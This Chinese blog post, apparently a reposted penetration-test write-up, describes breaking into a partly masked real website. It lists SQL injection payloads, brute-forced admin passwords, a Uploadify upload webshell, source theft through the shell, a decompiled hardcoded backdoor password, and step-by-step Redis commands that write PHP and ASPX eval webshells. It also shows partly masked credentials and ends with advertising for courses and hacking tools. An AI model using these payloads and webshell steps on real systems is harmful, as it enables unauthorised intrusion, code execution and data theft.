![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f63afd8.jpg\")
<\/p>\n\u5bf9\u4e8e\u7ed9\u5b9a\u6388\u6743\u7f51\u7ad9\u7684\u6e17\u900f,\u53ef\u4ee5\u901a\u8fc7\u6f0f\u6d1e\u626b\u63cf\u5de5\u5177\u8fdb\u884c\u626b\u63cf,\u4e5f\u53ef\u4ee5\u901a\u8fc7\u624b\u5de5\u6316\u6398,\u7279\u522b\u662f\u83b7\u53d6sql\u6ce8\u5165\u6f0f\u6d1e,\u901a\u8fc7\u6ce8\u5165\u6f0f\u6d1e\u914d\u5408\u5176\u5b83\u6f0f\u6d1e\u6765\u9010\u6b65\u83b7\u53d6webshell,\u751a\u81f3\u670d\u52a1\u5668\u6743\u9650,\u5728\u672c\u6587\u4e2d\u6d89\u53ca\u8be6\u7ec6\u4fe1\u606f\u6536\u96c6\u3001sql\u6ce8\u5165\u3001\u540e\u53f0\u5bc6\u7801\u52a0\u5bc6\u5206\u6790\u3001redis\u6f0f\u6d1e\u5229\u7528\u7b49,\u7b97\u662f\u4e00\u7bc7\u7ecf\u5178\u7684\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u6848\u4f8b,\u5177\u6709\u5b66\u4e60\u4ef7\u503c\u3002<\/p>\n
1.\u57df\u540d\u4fe1\u606f\u6536\u96c6<\/p>\n
(1)nslookup\u67e5\u8be2<\/p>\n
\u901a\u8fc7nslookup\u5bf9 qd.******.*****.cn\u8fdb\u884c\u67e5\u8be2,\u5982\u56fe1\u6240\u793a,\u83b7\u53d6\u7684\u4fe1\u606f\u662fcdn,\u65e0\u6cd5\u83b7\u53d6\u771f\u5b9eIP\u5730\u5740\u4fe1\u606f,\u540e\u9762\u901a\u8fc7https:\/\/www.yougetsignal.com\/tools\/web-sites-on-web-server\/\u8fdb\u884c\u57df\u540d\u67e5\u8be2,\u6bcf\u6b21\u67e5\u8be2\u7684\u57df\u540d\u5bf9\u5e94IP\u5730\u5740\u7ed3\u679c\u90fd\u5728\u53d8\u5316,\u8bf4\u660e\u7528\u4e86cdn\u52a0\u901f\u6280\u672f\u3002<\/p>\n
<\/p>\n
\u56fe1dns\u67e5\u8be2<\/p>\n
(2)toolbar.netcraft.com<\/p>\n
\u8fd8\u4ee5\u7528toolbar.netcraft.com\u8fdb\u884c\u68c0\u6d4b:https:\/\/toolbar.netcraft.com\/site_report?url=qd.******.*****.cn#last_reboot,\u5176\u7ed3\u679c\u5982\u56fe2\u6240\u793a,IP\u5730\u5740\u4e3a122.72.**.1**\u3002<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f67b04a.jpg\")
<\/p>\n
\u56fe2toolbar\u67e5\u8be2ip\u5730\u5740<\/p>\n
2.\u83b7\u53d6\u771f\u5b9eIP\u5730\u5740<\/p>\n
\u76ee\u6807\u7ad9\u70b9**.******.*****.cn\u4f7f\u7528\u8d26\u53f7\u548c\u5bc6\u7801(1773**5216 \/zyl**29122)\u8fdb\u884c\u767b\u5f55,\u901a\u8fc7burpsuite\u8fdb\u884c\u6293\u5305,\u53d1\u73b0\u6709\u4e00\u4e2a\u83b7\u53d6websocket url\u7684ajax\u8bf7\u6c42:<\/p>\n
ws:\/\/***.**.**.**:1234?uid=304519&subscribe=1&ticks=636570586031103379&stock=&key=89853473962f954c0c9aa96e13f55f22<\/p>\n
3.\u4f7f\u7528masscan\u8fdb\u884c\u7aef\u53e3\u626b\u63cf<\/p>\n
(1)masscan\u5b89\u88c5<\/p>\n
git clone https:\/\/github.com\/robertdavidgraham\/masscan.git<\/p>\n
cd masscan<\/p>\n
make<\/p>\n
make install<\/p>\n
(2)\u4f7f\u7528masscan\u626b\u63cf\u76ee\u6807\u6240\u6709\u7aef\u53e3\u5730\u5740<\/p>\n
masscan -p 1-65535 ***.**.**.** \u626b\u63cf\u540e\u53ef\u4ee5\u770b\u5230\u5176\u7aef\u53e3\u5f00\u653e\u60c5\u51b5,\u5982\u56fe3\u6240\u793a\u3002<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f6d0728.jpg\")
<\/p>\n
\u56fe3\u7aef\u53e3\u5f00\u653e\u60c5\u51b5<\/p>\n
\u901a\u8fc7\u5b9e\u9645\u8bbf\u95ee,1234\u30011235\u548c7780\u5bf9\u5916\u63d0\u4f9bweb\u670d\u52a1,61315\u4e3a\u8fdc\u7a0b\u7ec8\u7aef,3357\u548c26379\u7ecf\u8fc7telnet\u6216\u8005nc \u53d1\u9001keys *,\u80fd\u786e\u5b9a\u5176\u4e2d\u6709\u4e24\u4e2aredis\u7aef\u53e3,\u5176\u4e2d3357\u7aef\u53e3\u662fredis\u5e76\u4e14\u5b58\u5728\u8ba4\u8bc1,\u901a\u8fc7auth \u201c123456\u201d \u7b80\u5355\u5c1d\u8bd5\u5f31\u53e3\u4ee4\u5931\u8d25\u3002<\/p>\n
4.\u83b7\u53d6\u7269\u7406\u8def\u5f84\u4fe1\u606f<\/p>\n
\u8f93\u5165\u5730\u5740**.********.com\/Integral\/My\/ProductDetail.aspx?id=1\u5728\u51fa\u9519\u4fe1\u606f\u4e2d\u83b7\u53d6\u5176\u771f\u5b9e\u76ee\u5f55\u5730\u5740\u4e3ad:\\\\www\\\\font\\\\Plugins\\\\IntegralMall.Plugins\\\\Integral\\\\My\\\\ProductDetail.aspx,\u5982\u56fe4\u6240\u793a\u3002<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f722b3c.jpg\")
<\/p>\n
\u56fe4\u83b7\u53d6\u771f\u5b9e\u5730\u5740\u4fe1\u606f<\/p>\n
1.\u4e3b\u7ad9\u767b\u5f55\u6846\u6ce8\u5165<\/p>\n
\u901a\u8fc7burpsuite\u5bf9\u767b\u5f55\u8fc7\u7a0b\u8fdb\u884c\u6293\u5305,\u53d1\u73b0\u5176\u5b58\u5728sql\u6ce8\u5165,\u6784\u9020playload\u8fdb\u884c\u6d4b\u8bd5:<\/p>\n
POST \/account\/Login HTTP\/1.1<\/p>\n
Host: www.******.*****.cn<\/p>\n
Content-Length: 97<\/p>\n
Accept: application\/json, text\/javascript, *\/*; q=0.01<\/p>\n
Origin: http:\/\/www.******.*****.cn<\/p>\n
X-Requested-With: XMLHttpRequest<\/p>\n
User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/64.0.3282.186 Safari\/537.36<\/p>\n
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<\/p>\n
Referer: http:\/\/www.******.*****.cn\/account\/login?returnurl=%2Fproduct%2Findex%2F908<\/p>\n
Accept-Encoding: gzip, deflate<\/p>\n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8<\/p>\n
Cookie: ASP.NET_SessionId=ugovwxs3i0bk5yhxjqczcmjq; VerCode=f64aed3c5de2da53ee92698677ceb7abe1f9ab3258abf9472c078259245f48e1<\/p>\n
Connection: close<\/p>\n
userName=1\u2019,1,1,1);select convert(INT,user)\u2013+&password=123123&validateCode=th5b&rememberMe=false<\/p>\n
\u901a\u8fc7\u8be5\u65b9\u6cd5\u53ef\u4ee5\u5bf9\u5f53\u524d\u7684\u7ad9\u70b9\u8fdb\u884c\u6570\u636e\u5e93\u8868\u53ca\u5185\u5bb9\u67e5\u8be2\u3002<\/p>\n
2.\u83b7\u53d6\u540e\u53f0\u5bc6\u7801<\/p>\n
\u901a\u8fc7\u5927\u5b57\u5178\u5bf9\u540e\u53f0\u8fdb\u884c\u5bc6\u7801\u66b4\u529b\u7834\u89e3,\u83b7\u53d6******.*****.net\u7684admin\u8d26\u53f7\u5bf9\u5e94\u5bc6\u7801abc1234\u3002<\/p>\n
1. \u53d1\u73b0\u540e\u53f0\u4f7f\u7528Uploadify<\/p>\n
\u901a\u8fc7\u540e\u53f0\u53d1\u73b0\u7ad9\u70b9\u4f7f\u7528\u4e86Uploadify,Uploadify\u7ec4\u4ef6\u4f1a\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,\u6784\u9020\u53ef\u4e0a\u4f20\u7684html\u6587\u4ef6,\u5176\u4e2daction\u4e3aUploadHandler\u5b9e\u9645\u5730\u5740,\u6709\u7684\u662fUploadHandler.php\u3001UploadHandler.ashx\u7b49,\u672c\u5730\u8bbf\u95ee\u8be5html\u6587\u4ef6,\u76f4\u63a5\u4e0a\u4f20shell,\u5982\u56fe5\u6240\u793a,\u4e0a\u4f20\u6210\u529f\u540e\u4f1a\u663e\u793a\u6587\u4ef6\u540d\u79f0\u7b49\u4fe1\u606f\u3002<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f76a0c9.jpg\")
<\/p>\n
\u56fe5\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n
2.\u83b7\u53d6webshell<\/p>\n
\u5728\u524d\u9762\u4fdd\u5b58\u7684html\u6587\u4ef6\u4e2d\u53ef\u4ee5\u4efb\u610f\u4e0a\u4f20\u6587\u4ef6,\u4f46\u662f\u9700\u8981\u6ce8\u610f\u5176\u8def\u5f84\u5730\u5740<\/p>\n
http:\/\/******.*****.net\/uploadify\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u5c06UploadFile\u66f4\u6362\u4e3auploadify\u3002<\/p>\n
{\u201cFileName\u201d:\u201c7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d,\u201cFileUrl\u201d:\u201cUploadFile\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d,\u201cFileAllUrl\u201d:\u201chttp:\/\/******.*****.net\/UploadFile\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d}<\/p>\n
\u8fd9\u4e2a\u5730\u5740\u8bbf\u95ee\u5fc5\u987b\u662f0,\u4e5f\u5c31\u662f\u9664false\u5916\u7684\u503c\u624d\u80fd\u6210\u529f\u4e0a\u4f20,\u5982\u56fe6\u6210\u529f\u83b7\u53d6webshell\u3002<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f7b5d11.jpg\")
<\/p>\n
\u56fe6\u83b7\u53d6webshell<\/p>\n
1.\u6253\u5305\u5e76\u4e0b\u8f7d\u7f51\u7ad9\u6e90\u4ee3\u7801<\/p>\n
\u901a\u8fc7webshell\u5bf9\u8be5\u7ad9\u70b9\u8fdb\u884c\u6253\u5305\u538b\u7f29\u547d\u4ee4:rar a \u2013k \u2013r \u2013r \u2013m1 e:\\\\www\\\\all.rar e:\\\\www\\\\website\\\\,\u7136\u540e\u5c06\u5176\u538b\u7f29\u5305\u4e0b\u8f7d\u5230\u672c\u5730\u3002<\/p>\n
2.\u5bc6\u7801\u52a0\u5bc6\u51fd\u6570\u5206\u6790<\/p>\n
\u901a\u8fc7Reflector\u5bf9asp.net\u7684dll\u6587\u4ef6\u8fdb\u884c\u53cd\u7f16\u8bd1,\u83b7\u53d6\u5176\u6e90\u4ee3\u7801,\u4ece\u6e90\u4ee3\u7801\u4e2d\u67e5\u627e\u767b\u5f55\u52a0\u5bc6\u7684\u51fd\u6570:<\/p>\n
public static string MD5Encrypt(string str)<\/p>\n
{<\/p>\n
string text = str + \u201c202cb962ac59075b964b07152d234b70\u201d;<\/p>\n
string password = text.Substring(0, 32);<\/p>\n
string password2 = text.Substring(32);<\/p>\n
return (FormsAuthentication.HashPasswordForStoringInConfigFile(password, \u201cMD5\u201d) + FormsAuthentication.HashPasswordForStoringInConfigFile(password2, \u201cMD5\u201d)).ToLower();<\/p>\n
}<\/p>\n
md5(123)=202cb962ac59075b964b07152d234b70<\/p>\n
\u5bc6\u7801\u91c7\u7528password+123\u7684md5\u52a0\u5bc6,\u5bc6\u7801\u503c\u4e3amd5(password)+md5(123)\u5f97\u5230\u7684\u5b9e\u9645\u4f4d\u6570\u4e3a64\u4f4d\u3002\u771f\u5b9e\u5bc6\u7801\u4e3a1-32\u4f4d\u5b57\u7b26\u4e32,\u5c06\u5176\u8fdb\u884cmd5\u89e3\u5bc6\u5373\u53ef\u3002<\/p>\n
3. btnLogin_Click\u767b\u5f55\u68c0\u67e5\u4e2d\u5b58\u5728\u903b\u8f91\u540e\u95e8<\/p>\n
protected void btnLogin_Click(object sender, EventArgs e)<\/p>\n
{<\/p>\n
string text = this.txtUserName.Text.Trim();<\/p>\n
string str = this.txtPassword.Text.Trim();<\/p>\n
string str2 = this.txtCode.Text.Trim().ToLower();<\/p>\n
if (string.Compare(StringHelper.MD5Encrypt(str2), ValidationImage.GetAdminVerifyCode(), StringComparison.OrdinalIgnoreCase) != 0)<\/p>\n
{<\/p>\n
MessageBox.Show(this, \u201c\u9a8c\u8bc1\u7801\u8f93\u5165\u6709\u8bef,\u8bf7\u91cd\u65b0\u8f93\u5165!\u201d);<\/p>\n
return;<\/p>\n
}<\/p>\n
AdministratorInfo model = Administrator.GetModel(text);<\/p>\n
if (model == null)<\/p>\n
{<\/p>\n
MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef,\u767b\u5f55\u5931\u8d25!\u201d);<\/p>\n
return;<\/p>\n
}<\/p>\n
if (model.get_RolesType() != 1 && model.get_RolesType() != 2)<\/p>\n
{<\/p>\n
MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef,\u767b\u5f55\u5931\u8d25!\u201d);<\/p>\n
return;<\/p>\n
}<\/p>\n
if (string.Compare(StringHelper.MD5Encrypt(str).ToLower(), StringHelper.MD5Encrypt(\u201c7CAB2C0E99AEFDE6255F804B87155FE7BBA5AE03112223\u201d).ToLower(), StringComparison.OrdinalIgnoreCase) != 0 && string.Compare(StringHelper.MD5Encrypt(str), model.get_AdminPassWord(), StringComparison.OrdinalIgnoreCase) != 0)<\/p>\n
{<\/p>\n
MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef,\u767b\u5f55\u5931\u8d25!\u201d);<\/p>\n
return;<\/p>\n
}<\/p>\n
if (model.get_IsLock())<\/p>\n
{<\/p>\n
MessageBox.Show(this, \u201c\u7528\u6237\u5df2\u7981\u6b62\u767b\u5f55,\u8bf7\u8054\u7cfb\u7cfb\u7edf\u7ba1\u7406\u5458!\u201d);<\/p>\n
return;<\/p>\n
}<\/p>\n
AdminPrincipal adminPrincipal = new AdminPrincipal();<\/p>\n
adminPrincipal.set_AdministratorID(model.get_AdministratorID());<\/p>\n
adminPrincipal.set_AdminName(model.get_AdminName());<\/p>\n
adminPrincipal.set_RolesType(model.get_RolesType());<\/p>\n
adminPrincipal.set_SyRolesID(model.get_SyRolesID());<\/p>\n
adminPrincipal.set_TrueName(model.get_AdminName());<\/p>\n
adminPrincipal.set_Roles(model.get_RolesType().ToString());<\/p>\n
string userData = adminPrincipal.SerializeToString();<\/p>\n
Administrator.UpdateLoginLast(model.get_AdministratorID());<\/p>\n
FormsAuthenticationTicket formsAuthenticationTicket = new FormsAuthenticationTicket(1, adminPrincipal.get_AdministratorID().ToString(), DateTime.Now, DateTime.Now.AddMinutes((double)SiteConfig.get_SecurityConfig().get_TicketTime()), false, userData);<\/p>\n
ManageCookies.CreateAdminCookie(formsAuthenticationTicket, false, DateTime.Now);<\/p>\n
BasePage.ResponseRedirect(\u201cAdmin_Index.aspx\u201d);<\/p>\n
}<\/p>\n
\u8be5\u51fd\u6570\u4e2d\u5b58\u5728\u903b\u8f91\u540e\u95e8,\u4f7f\u7528\u4efb\u4f55\u8d26\u53f7\u5747\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55<\/p>\n
\u7528\u6237\u540d:\u968f\u610f \u5bc6\u7801\u4e3a:7CAB2C0E99AEFDE6255F804B87155FE7BBA5AE03112223<\/p>\n
1. redis\u8d26\u53f7\u83b7\u53d6webshell<\/p>\n
\u77e5\u9053\u7f51\u7ad9\u7684\u771f\u5b9e\u8def\u5f84,\u5177\u4f53\u6b65\u9aa4:<\/p>\n
(1)\u8fde\u63a5\u5ba2\u6237\u7aef\u548c\u7aef\u53e3<\/p>\n
telnet ***.**.**.** 3357<\/p>\n
(2)\u8ba4\u8bc1<\/p>\n
auth ^123456$<\/p>\n
(3)\u67e5\u770b\u5f53\u524d\u7684\u914d\u7f6e\u4fe1\u606f,\u5e76\u590d\u5236\u4e0b\u6765\u7559\u5f85\u540e\u7eed\u6062\u590d<\/p>\n
config get dir<\/p>\n
config get dbfilename<\/p>\n
(4)\u914d\u7f6e\u5e76\u5199\u5165webshell<\/p>\n
config set dir E:\/www\/font<\/p>\n
config set dbfilename redis.aspx<\/p>\n
set webshell \u201c<?php phpinfo(); ?>\u201d<\/p>\n
\/\/php\u67e5\u770b\u4fe1\u606f<\/p>\n
set webshell "<?php @eval($\\\\\\\\\\\\_POST\\\\\\\\\\\\['chopper'\\\\\\\\\\\\]);?> "<\/p>\n
\/\/phpwebshell<\/p>\n
set webshell"<%eval(Request.Item[\u2018cmd\u2019],\\\\\u201cunsafe\\\\\u201d);%>"<\/p>\n
\/\/ aspx\u7684webshell,\u6ce8\u610f\u53cc\u5f15\u53f7\u4f7f\u7528\\\\"<\/p>\n
save<\/p>\n
\u4fdd\u5b58<\/p>\n
get a<\/p>\n
\u67e5\u770b\u6587\u4ef6\u5185\u5bb9<\/p>\n
(5)\u8bbf\u95eewebshell\u5730\u5740<\/p>\n
\u51fa\u73b0\u7c7b\u4f3c:<\/p>\n
REDIS0006?webshell\u2019a@H\uf8f5\u6400???<\/p>\n
\u8868\u660e\u6b63\u786e\u83b7\u53d6webshell<\/p>\n
(6)\u6062\u590d\u539f\u59cb\u8bbe\u7f6e<\/p>\n
config get dir<\/p>\n
config get dbfilename<\/p>\n
flushdb<\/p>\n
2.\u83b7\u53d6shell\u7684\u5b8c\u6574\u547d\u4ee4<\/p>\n
telnet ***.**.**.** 3357<\/p>\n
auth ^123456$<\/p>\n
config get dir<\/p>\n
config get dbfilename<\/p>\n
config set dir E:\/www\/font<\/p>\n
config set dbfilename redis2.aspx<\/p>\n
set webshell \u201c<?php phpinfo(); ?>\u201d<\/p>\n
set webshell "<?php @eval($\\\\\\\\\\\\_POST\\\\\\\\\\\\['chopper'\\\\\\\\\\\\]);?> "<\/p>\n
set a \u201c<%@ Page Language=\\\\\u201cJscript\\\\\u201d%><%eval(Request.Item[\\\\\u201cc\\\\\u201d],\\\\\u201cunsafe\\\\\u201d);%>\u201d<\/p>\n
save<\/p>\n
get a<\/p>\n
config set dir<\/p>\n
config set dbfilename<\/p>\n
flushdb<\/p>\n
\u901a\u8fc7\u4ee5\u4e0a\u65b9\u6cd5\u6210\u529f\u83b7\u53d6\u76ee\u6807\u7ad9\u70b9\u7684webshell,\u81f3\u6b64\u6e17\u900f\u7ed3\u675f\u3002<\/p>\n
\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:<\/p>\n
1.burpsuite\u6293\u5305,\u5bf9\u5305\u6587\u4ef6,\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt<\/p>\n
2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3,\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u3002<\/p>\n
3. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n
4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u6790<\/p>\n
5.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd5<\/p>\n
6.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf<\/p>\n
(1)massscan \u2013p 1-65535 ***.**.**.**<\/p>\n
(2)nmap.exe -p 1-65535 -T4 -A -v -oX ***.**.**.xml ***.**.**.1-254<\/p>\n
\u521b\u4f5c\u4e0d\u6613,\u7528\u60a8\u53d1\u8d22\u7684\u5c0f\u624b\u5173\u6ce8\u3001\u559c\u6b22+\u6536\u85cf\u4e00\u4e0b\u6211,\u60a8\u7684\u5173\u6ce8\u548c\u70b9\u8d5e\u5c31\u662f\u5bf9\u6211\u7ee7\u7eed\u521b\u4f5c\u7684\u6700\u5927\u52a8\u529b,\u8c22\u8c22!<\/p>\n
\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b,\u552e\u4ef7298\u5143,\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981,\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002<\/p>\n
\u9ed1\u5ba2&\u7f51\u7edc\u5b89\u5168\u5982\u4f55\u5b66\u4e60<\/p>\n
\u4eca\u5929\u53ea\u8981\u4f60\u7ed9\u6211\u7684\u6587\u7ae0\u70b9\u8d5e,\u6211\u79c1\u85cf\u7684\u7f51\u5b89\u5b66\u4e60\u8d44\u6599\u4e00\u6837\u514d\u8d39\u5171\u4eab\u7ed9\u4f60\u4eec,\u6765\u770b\u770b\u6709\u54ea\u4e9b\u4e1c\u897f\u3002<\/p>\n
1.\u5b66\u4e60\u8def\u7ebf\u56fe<\/p>\n
![\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043048-680db2f806533.jpg\")
<\/p>\n
\u653b\u51fb\u548c\u9632\u5b88\u8981\u5b66\u7684\u4e1c\u897f\u4e5f\u4e0d\u5c11,\u5177\u4f53\u8981\u5b66\u7684\u4e1c\u897f\u6211\u90fd\u5199\u5728\u4e86\u4e0a\u9762\u7684\u8def\u7ebf\u56fe,\u5982\u679c\u4f60\u80fd\u5b66\u5b8c\u5b83\u4eec,\u4f60\u53bb\u5c31\u4e1a\u548c\u63a5\u79c1\u6d3b\u5b8c\u5168\u6ca1\u6709\u95ee\u9898\u3002<\/p>\n
2.\u89c6\u9891\u6559\u7a0b \u7f51\u4e0a\u867d\u7136\u4e5f\u6709\u5f88\u591a\u7684\u5b66\u4e60\u8d44\u6e90,\u4f46\u57fa\u672c\u4e0a\u90fd\u6b8b\u7f3a\u4e0d\u5168\u7684,\u8fd9\u662f\u6211\u4eec\u548c\u7f51\u5b89\u5927\u5382360\u5171\u540c\u7814\u53d1\u7684\u7f51\u5b89\u89c6\u9891\u6559\u7a0b,\u4e4b\u524d\u90fd\u662f\u5185\u90e8\u8d44\u6e90,\u4e13\u4e1a\u65b9\u9762\u7edd\u5bf9\u53ef\u4ee5\u79d2\u6740\u56fd\u518599%\u7684\u673a\u6784\u548c\u4e2a\u4eba\u6559\u5b66!\u5168\u7f51\u72ec\u4e00\u4efd,\u4f60\u4e0d\u53ef\u80fd\u5728\u7f51\u4e0a\u627e\u5230\u8fd9\u4e48\u4e13\u4e1a\u7684\u6559\u7a0b\u3002<\/p>\n
\u5185\u5bb9\u6db5\u76d6\u4e86\u5165\u95e8\u5fc5\u5907\u7684\u64cd\u4f5c\u7cfb\u7edf\u3001\u8ba1\u7b97\u673a\u7f51\u7edc\u548c\u7f16\u7a0b\u8bed\u8a00\u7b49\u521d\u7ea7\u77e5\u8bc6,\u800c\u4e14\u5305\u542b\u4e86\u4e2d\u7ea7\u7684\u5404\u79cd\u6e17\u900f\u6280\u672f,\u5e76\u4e14\u8fd8\u6709\u540e\u671f\u7684CTF\u5bf9\u6297\u3001\u533a\u5757\u94fe\u5b89\u5168\u7b49\u9ad8\u9636\u6280\u672f\u3002\u603b\u5171200\u591a\u8282\u89c6\u9891,200\u591aG\u7684\u8d44\u6e90,\u4e0d\u7528\u62c5\u5fc3\u5b66\u4e0d\u5168\u3002 ![\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fb8aebe.gif\")
\u56e0\u7bc7\u5e45\u6709\u9650,\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599,\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 ![\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbba8e9.bmp\")
<\/p>\n
🐵\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6,\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6👉:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n
3.\u6280\u672f\u6587\u6863\u548c\u7535\u5b50\u4e66 \u6280\u672f\u6587\u6863\u4e5f\u662f\u6211\u81ea\u5df1\u6574\u7406\u7684,\u5305\u62ec\u6211\u53c2\u52a0\u5927\u578b\u7f51\u5b89\u884c\u52a8\u3001CTF\u548c\u6316SRC\u6f0f\u6d1e\u7684\u7ecf\u9a8c\u548c\u6280\u672f\u8981\u70b9,\u7535\u5b50\u4e66\u4e5f\u6709200\u591a\u672c,\u7531\u4e8e\u5185\u5bb9\u7684\u654f\u611f\u6027,\u6211\u5c31\u4e0d\u4e00\u4e00\u5c55\u793a\u4e86\u3002<\/p>\n
![\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbdd3a9.png\")
<\/p>\n
\u56e0\u7bc7\u5e45\u6709\u9650,\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599,\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <\/p>\n
🐵\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6,\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6👉:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n
4.\u5de5\u5177\u5305\u3001\u9762\u8bd5\u9898\u548c\u6e90\u7801 \u201c\u5de5\u6b32\u5584\u5176\u4e8b\u5fc5\u5148\u5229\u5176\u5668\u201d\u6211\u4e3a\u5927\u5bb6\u603b\u7ed3\u51fa\u4e86\u6700\u53d7\u6b22\u8fce\u7684\u51e0\u5341\u6b3e\u6b3e\u9ed1\u5ba2\u5de5\u5177\u3002\u6d89\u53ca\u8303\u56f4\u4e3b\u8981\u96c6\u4e2d\u5728 \u4fe1\u606f\u6536\u96c6\u3001Android\u9ed1\u5ba2\u5de5\u5177\u3001\u81ea\u52a8\u5316\u5de5\u5177\u3001\u7f51\u7edc\u9493\u9c7c\u7b49,\u611f\u5174\u8da3\u7684\u540c\u5b66\u4e0d\u5bb9\u9519\u8fc7\u3002<\/p>\n
\u8fd8\u6709\u6211\u89c6\u9891\u91cc\u8bb2\u7684\u6848\u4f8b\u6e90\u7801\u548c\u5bf9\u5e94\u7684\u5de5\u5177\u5305,\u9700\u8981\u7684\u8bdd\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <\/p>\n
🐵\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6,\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6👉:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n
\u6700\u540e\u5c31\u662f\u6211\u8fd9\u51e0\u5e74\u6574\u7406\u7684\u7f51\u5b89\u65b9\u9762\u7684\u9762\u8bd5\u9898,\u5982\u679c\u4f60\u662f\u8981\u627e\u7f51\u5b89\u65b9\u9762\u7684\u5de5\u4f5c,\u5b83\u4eec\u7edd\u5bf9\u80fd\u5e2e\u4f60\u5927\u5fd9\u3002<\/p>\n
\u8fd9\u4e9b\u9898\u76ee\u90fd\u662f\u5927\u5bb6\u5728\u9762\u8bd5\u6df1\u4fe1\u670d\u3001\u5947\u5b89\u4fe1\u3001\u817e\u8baf\u6216\u8005\u5176\u5b83\u5927\u5382\u9762\u8bd5\u65f6\u7ecf\u5e38\u9047\u5230\u7684,\u5982\u679c\u5927\u5bb6\u6709\u597d\u7684\u9898\u76ee\u6216\u8005\u597d\u7684\u89c1\u89e3\u6b22\u8fce\u5206\u4eab\u3002<\/p>\n
\u53c2\u8003\u89e3\u6790:\u6df1\u4fe1\u670d\u5b98\u7f51\u3001\u5947\u5b89\u4fe1\u5b98\u7f51\u3001Freebuf\u3001csdn\u7b49<\/p>\n
